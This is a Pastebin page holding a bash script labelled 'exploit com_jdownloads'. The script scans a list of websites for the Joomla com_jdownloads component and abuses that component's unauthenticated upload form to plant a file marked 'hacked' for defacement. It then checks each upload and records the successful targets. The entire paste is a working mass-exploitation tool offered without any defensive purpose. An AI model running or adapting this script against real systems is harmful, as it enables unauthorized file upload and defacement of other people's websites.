API tools faq
paste
Advertisement
Guest User

exploit com_jdownloads

a guest
Sep 20th, 2014
2,893
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.63 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. #coded = Gantengers Crew
  3. UploadJD(){
  4. curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
  5. -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
  6. -H "Accept-Language: en-us,en;q=0.5" \
  7. -H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
  8. -F "name=defacerid" \
  9. -F "mail=haxorid@gmail.com" \
  10. -F "catlist=1" \
  11. -F "file_upload=@doczxcvbnm.zip" \
  12. -F "filetitle=document" \
  13. -F "description=id" \
  14. -F "0537bf34386f2f179b57f09ed020e2c0=1" \
  15. -F "send=1" \
  16. -F "senden=Send file" \
  17. -F "description=defacerid" \
  18. -F "option=com_jdownloads" \
  19. -F "view=upload" \
  20. -F "pic_upload=@${namafile}" \
  21. --request POST "http://${1}/index.php?option=com_jdownloads&Itemid=0&view=upload"
  22. }
  23. CD(){
  24. curl --silent --max-time 10 --connect-timeout 10 "http://${1}/images/jdownloads/screenshots/${namafile}" -o tmp/cd.txt
  25. if [ ! -f tmp/cd.txt ];then
  26. echo "--> $urlnya : RTO"
  27. continue
  28. fi
  29. cat tmp/cd.txt | grep -i "hacked" > /dev/null;cd=$?
  30. if [ $cd -eq 0 ];then
  31. echo "--> ${1}/images/jdownloads/screenshots/${namafile} : exploit success"
  32. echo "http://${1}/images/jdownloads/screenshots/${namafile}" >> success.txt
  33. else
  34. echo "--> $urlnya : exploit failed"
  35. fi
  36. rm -f tmp/cd.txt
  37. }
  38. CV(){
  39. curl --silent --max-time 10 --connect-timeout 10 "http://${1}/components/com_jdownloads/jdownloads.js" -o tmp/cv.txt
  40. if [ ! -f tmp/cv.txt ];then
  41. echo "--> $urlnya : RTO"
  42. continue
  43. fi
  44. cat tmp/cv.txt | grep "document.uploadForm.file_upload.value\|com_jdownloads\|Toggles the check state of a group of boxes" > /dev/null;cv=$?
  45. if [ $cv -eq 1 ];then
  46. echo "--> $urlnya : not vuln"
  47. rm -f tmp/cv.txt
  48. continue
  49. else
  50. echo "--> $urlnya : found com_jdownloads"
  51. fi
  52. }
  53. Exp(){
  54. for url in `cat $list`
  55. do
  56. urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
  57. if [ ! -f load.txt ];then
  58.  touch load.txt
  59. fi
  60. cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
  61. if [ $ccl -eq 1 ];then
  62. echo $urlnya >> load.txt
  63. else
  64. #udah pernah di load di file load.txt
  65. #kalau mau load ulang,silakan hapus file load.txt
  66. continue
  67. fi
  68. echo "--> $urlnya : check"
  69. CV $urlnya
  70. UploadJD $urlnya
  71. CD $urlnya
  72. done
  73. }
  74. Lengkap(){
  75. if [ ! -d tmp ];then
  76. mkdir tmp
  77. fi
  78. if [ ! -f $namefile ];then
  79. echo "[?] file $namafile gak ada"
  80. exit
  81. fi
  82. if [ ! -f $list ];then
  83. echo "[?] file $list gak ada"
  84. exit
  85. fi
  86. cat $namafile | grep -i "hacked" > /dev/null;chh=$?
  87. if [ $chh -eq 1 ];then
  88. echo "hacked" >> $namafile
  89. fi
  90. echo "zip" > doczxcvbnm.zip
  91. }
  92. read -p "[+] Enter name of gif = " namafile
  93. read -p "[+] Enter list target = " list
  94. Lengkap
  95. Exp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!